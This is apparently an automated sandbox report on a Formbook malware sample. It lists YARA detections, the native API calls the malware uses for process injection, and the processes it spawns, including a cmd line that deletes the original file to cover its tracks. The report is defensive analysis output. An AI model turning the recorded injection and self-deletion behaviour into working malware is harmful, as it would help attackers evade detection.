          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe, Code function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030E3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 0041A390 appears 38 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 0041A4C0 appears 38 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 00B0B150 appears 39 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0541B150 appears 66 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004185E0 NtCreateFile,1_2_004185E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00418690 NtReadFile,1_2_00418690
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00418710 NtClose,1_2_00418710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004187C0 NtAllocateVirtualMemory,1_2_004187C0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004185DA NtCreateFile,1_2_004185DA
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B498F0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B49860
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49840 NtDelayExecution,LdrInitializeThunk,1_2_00B49840
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B499A0 NtCreateSection,LdrInitializeThunk,1_2_00B499A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B49910
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A20 NtResumeThread,LdrInitializeThunk,1_2_00B49A20
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B49A00
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A50 NtCreateFile,LdrInitializeThunk,1_2_00B49A50
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495D0 NtClose,LdrInitializeThunk,1_2_00B495D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49540 NtReadFile,LdrInitializeThunk,1_2_00B49540
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B496E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B49660
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B497A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B49780
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49FE0 NtCreateMutant,LdrInitializeThunk,1_2_00B49FE0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B49710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B498A0 NtWriteVirtualMemory,1_2_00B498A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49820 NtEnumerateKey,1_2_00B49820
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4B040 NtSuspendThread,1_2_00B4B040
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B499D0 NtCreateProcessEx,1_2_00B499D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49950 NtQueueApcThread,1_2_00B49950
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A80 NtOpenDirectoryObject,1_2_00B49A80
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A10 NtQuerySection,1_2_00B49A10
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A3B0 NtGetContextThread,1_2_00B4A3B0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49B00 NtSetValueKey,1_2_00B49B00
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495F0 NtQueryInformationFile,1_2_00B495F0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4AD30 NtSetContextThread,1_2_00B4AD30
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49520 NtWaitForSingleObject,1_2_00B49520
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49560 NtWriteFile,1_2_00B49560
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496D0 NtCreateKey,1_2_00B496D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49610 NtEnumerateValueKey,1_2_00B49610
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49670 NtQueryInformationProcess,1_2_00B49670
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49650 NtQueryValueKey,1_2_00B49650
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49730 NtQueryVirtualMemory,1_2_00B49730
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A710 NtOpenProcessToken,1_2_00B4A710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49770 NtSetInformationFile,1_2_00B49770
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A770 NtOpenThread,1_2_00B4A770
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49760 NtOpenProcess,1_2_00B49760
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185E0 NtCreateFile,1_1_004185E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418690 NtReadFile,1_1_00418690
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418710 NtClose,1_1_00418710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004187C0 NtAllocateVirtualMemory,1_1_004187C0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185DA NtCreateFile,1_1_004185DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459540 NtReadFile,LdrInitializeThunk,6_2_05459540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595D0 NtClose,LdrInitializeThunk,6_2_054595D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459710 NtQueryInformationToken,LdrInitializeThunk,6_2_05459710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459FE0 NtCreateMutant,LdrInitializeThunk,6_2_05459FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459780 NtMapViewOfSection,LdrInitializeThunk,6_2_05459780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459650 NtQueryValueKey,LdrInitializeThunk,6_2_05459650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_05459660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596D0 NtCreateKey,LdrInitializeThunk,6_2_054596D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_054596E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_05459910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599A0 NtCreateSection,LdrInitializeThunk,6_2_054599A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459840 NtDelayExecution,LdrInitializeThunk,6_2_05459840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459860 NtQuerySystemInformation,LdrInitializeThunk,6_2_05459860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A50 NtCreateFile,LdrInitializeThunk,6_2_05459A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459560 NtWriteFile,6_2_05459560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459520 NtWaitForSingleObject,6_2_05459520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545AD30 NtSetContextThread,6_2_0545AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595F0 NtQueryInformationFile,6_2_054595F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459760 NtOpenProcess,6_2_05459760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A770 NtOpenThread,6_2_0545A770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459770 NtSetInformationFile,6_2_05459770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A710 NtOpenProcessToken,6_2_0545A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459730 NtQueryVirtualMemory,6_2_05459730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054597A0 NtUnmapViewOfSection,6_2_054597A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459670 NtQueryInformationProcess,6_2_05459670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459610 NtEnumerateValueKey,6_2_05459610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459950 NtQueueApcThread,6_2_05459950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599D0 NtCreateProcessEx,6_2_054599D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545B040 NtSuspendThread,6_2_0545B040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459820 NtEnumerateKey,6_2_05459820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598F0 NtReadVirtualMemory,6_2_054598F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598A0 NtWriteVirtualMemory,6_2_054598A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459B00 NtSetValueKey,6_2_05459B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A3B0 NtGetContextThread,6_2_0545A3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A00 NtProtectVirtualMemory,6_2_05459A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A10 NtQuerySection,6_2_05459A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A20 NtResumeThread,6_2_05459A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A80 NtOpenDirectoryObject,6_2_05459A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385E0 NtCreateFile,6_2_012385E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238710 NtClose,6_2_01238710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012387C0 NtAllocateVirtualMemory,6_2_012387C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238690 NtReadFile,6_2_01238690
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385DA NtCreateFile,6_2_012385DA
          Source: Y1p8VPvyU2.exe, 00000000.00000003.302983969.0000000002D1F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000000.00000003.304611103.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362160211.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll 13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
          Source: Y1p8VPvyU2.exeVirustotal: Detection: 35%
          Source: Y1p8VPvyU2.exeReversingLabs: Detection: 64%
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\user\Desktop\Y1p8VPvyU2.exeJump to behavior
          Source: Y1p8VPvyU2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nso1022.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@7/3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040411B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cscript.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: cscript.pdbUGP source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023581 push eax; ret 0_2_100235B1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023600 push eax; ret 0_2_100235B1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10013245 push ecx; ret 0_2_10013258
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B822 push eax; ret 1_2_0041B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B82B push eax; ret 1_2_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B88C push eax; ret 1_2_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00415094 push ds; iretd 1_2_00415095
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041A269 push ebx; retf 1_2_0041A26B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004044C6 push eax; retf 1_2_004044C7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B7D5 push eax; ret 1_2_0041B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B5D0D1 push ecx; ret 1_2_00B5D0E4
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B822 push eax; ret 1_1_0041B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B82B push eax; ret 1_1_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B88C push eax; ret 1_1_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00415094 push ds; iretd 1_1_00415095
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041A269 push ebx; retf 1_1_0041A26B
